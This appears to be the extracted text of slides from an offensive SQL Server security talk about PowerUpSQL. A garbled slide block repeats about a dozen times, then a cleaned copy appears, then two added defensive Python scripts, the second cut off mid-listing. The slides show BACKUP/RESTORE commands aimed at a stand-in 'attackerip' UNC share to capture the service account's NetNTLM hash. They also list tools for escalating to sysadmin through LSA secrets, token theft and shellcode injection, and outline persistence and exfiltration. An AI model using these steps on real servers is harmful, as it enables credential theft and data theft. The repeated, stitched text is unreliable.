1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
Escalating Privileges: UNC Path Injection
Another Issue
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands:
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016: https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It’s self-descriptive.
Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges
OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach             2000  2005  2008  2012  2014  2016
LSA Secrets           x     x     x     x     x     x
Local Administrator   x     x
LocalSystem           x     x     x
Process Migration     x     x     x     x     x     x
Token Stealing        x     x     x     x     x     x
Single User Mode      x     x     x     x     x
(The extracted slide preserves only the number of marks per row; for the three rows with fewer than six marks, the original column positions were not recoverable.)
Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options:
Approach                                                       Common Tools
Access as Local Administrator                                  Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                          Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets   Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process    Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process     Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                               DBATools
Common Post Exploitation Activities
Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
• SQL Server layer: startup procedures, agent jobs, triggers, modified code
• OS layer: registry & file auto-runs, tasks, services, etc.
2. Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
• All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
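Because the UNC path injection above can be issued by any PUBLIC-role login, and because SQL Server 2000 to 2008 has no patch for it, a practical defensive control is to review captured BACKUP/RESTORE statements for UNC targets that are not your backup servers. The following is an added example, not PowerUpSQL code and not from the presentation: it parses statement text (in practice taken from SQL Server Audit or Extended Events; here a constructed sample), extracts the DISK target, and flags UNC hosts outside an allowlist, noting when the issuing login is not a known backup or admin account. The host names, logins and the `10.10.10.5` address are constructed placeholders.

```python
"""Flag BACKUP/RESTORE statements whose DISK target is an unapproved UNC host.

Added example (not PowerUpSQL or presentation code). Statement text and
logins below are constructed; in production they would come from a SQL
Server Audit or Extended Events capture of BACKUP/RESTORE statements.
"""
import re
from dataclasses import dataclass

# BACKUP|RESTORE DATABASE|LOG <db> ... TO|FROM DISK = '<path>'  (or N'<path>')
_DISK_RE = re.compile(
    r"\b(?P<verb>BACKUP|RESTORE)\s+(?:DATABASE|LOG)\s+(?P<db>\[[^\]]+\]|\w+)"
    r".*?\b(?:TO|FROM)\s+DISK\s*=\s*N?'(?P<path>[^']*)'",
    re.IGNORECASE | re.DOTALL,
)
# A UNC path: two leading backslashes, then the host, then a separator.
_UNC_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\")


@dataclass(frozen=True)
class Finding:
    login: str
    verb: str
    database: str
    path: str
    host: str
    reason: str


def parse_disk_target(statement):
    """Return (verb, database, path) or None if not a disk BACKUP/RESTORE."""
    m = _DISK_RE.search(statement)
    if not m:
        return None
    return m.group("verb").upper(), m.group("db").strip("[]"), m.group("path")


def unc_host(path):
    """Return the lower-cased host of a UNC path, or None for local paths."""
    m = _UNC_RE.match(path)
    return m.group("host").lower() if m else None


def audit_statements(events, approved_hosts, privileged_logins=()):
    """Return a Finding for each BACKUP/RESTORE aimed at a non-allowlisted UNC host.

    Local paths are ignored: only a UNC target makes the service account
    authenticate to a remote host. Statements are flagged regardless of
    outcome, since the point on the page is that PUBLIC-role logins can issue them.
    """
    approved = {h.lower() for h in approved_hosts}
    findings = []
    for ev in events:
        parsed = parse_disk_target(ev["statement"])
        if parsed is None:
            continue
        verb, db, path = parsed
        host = unc_host(path)
        if host is None or host in approved:
            continue
        reason = "UNC target not in backup allowlist"
        if ev["login"] not in privileged_logins:
            reason += "; issued by non-privileged login"
        findings.append(Finding(ev["login"], verb, db, path, host, reason))
    return findings


# Constructed sample capture (placeholder hosts, logins and IP address).
SAMPLE_EVENTS = [
    {"login": "CORP\\svc_backup",
     "statement": "BACKUP DATABASE [Sales] TO DISK = N'\\\\backup01\\sqlbackups\\Sales.bak'"},
    {"login": "CORP\\jsmith",
     "statement": "BACKUP LOG [TESTING] TO DISK = '\\\\10.10.10.5\\file'"},
    {"login": "CORP\\jsmith",
     "statement": "RESTORE LOG [TESTING] FROM DISK = '\\\\10.10.10.5\\file'"},
    {"login": "sa",
     "statement": "BACKUP DATABASE [HR] TO DISK = 'D:\\Backups\\HR.bak'"},
    {"login": "CORP\\jsmith", "statement": "SELECT name FROM sys.databases"},
]

APPROVED_BACKUP_HOSTS = ["backup01"]
PRIVILEGED_LOGINS = ["sa", "CORP\\svc_backup"]

if __name__ == "__main__":
    for f in audit_statements(SAMPLE_EVENTS, APPROVED_BACKUP_HOSTS, PRIVILEGED_LOGINS):
        print(f"{f.login}: {f.verb} {f.database} -> {f.path} ({f.reason})")
```

Running the sample yields two findings, both for the PUBLIC-role login writing to and reading from the unknown host. The allowlist is the important tunable: a backup server that is missing from it produces noise, while an empty allowlist flags every UNC backup, which is a reasonable starting posture on instances that only back up to local disk.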
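The post-exploitation overview lists "regular expressions and the Luhn formula against data samples" as the way to identify sensitive data. The same technique is how a DBA or data-protection team classifies columns before an attacker does. The following is an added example, not PowerUpSQL code and not from the presentation: it scans a constructed set of sampled column values with a card-number regex and keeps only matches that pass the Luhn check, which is what separates a real card number from a 16-digit order reference. The column names and values are constructed; the card numbers are the standard publicly documented test numbers.

```python
"""Classify sampled column values as card-number-like using a regex plus Luhn.

Added example (not PowerUpSQL or presentation code). Sample data is
constructed; in practice the values would be the first N rows of each
column returned by a data-sampling query.
"""
import re

# 13 to 19 digits, optionally separated by single spaces or hyphens,
# not embedded inside a longer run of digits.
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits):
    """Luhn check: double every second digit from the right, sum, mod 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = ord(ch) - ord("0")
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def card_like_values(value):
    """Return the digit strings in one value that look like cards and pass Luhn."""
    hits = []
    for m in CARD_RE.finditer(str(value)):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append(digits)
    return hits


def scan_samples(samples, min_hits=1):
    """Map column name -> number of Luhn-valid card-like values in its sample.

    Columns with fewer than min_hits are dropped so that a single false
    positive in free text does not classify a whole column.
    """
    results = {}
    for column, values in samples.items():
        hits = sum(len(card_like_values(v)) for v in values)
        if hits >= min_hits:
            results[column] = hits
    return results


# Constructed sample: two real-looking card columns, one numeric reference
# column that defeats the regex alone, phone numbers that never match.
SAMPLE_COLUMNS = {
    "dbo.Orders.card_number": ["4111111111111111", "5500000000000004",
                               "4111-1111-1111-1112"],   # last one fails Luhn
    "dbo.Orders.order_ref":   ["1234567890123456", "9876543210987654"],
    "dbo.Customers.phone":    ["+1 555 010 4477", "555-010-2291"],
    "dbo.Customers.notes":    ["called re: card 3400 0000 0000 009 declined"],
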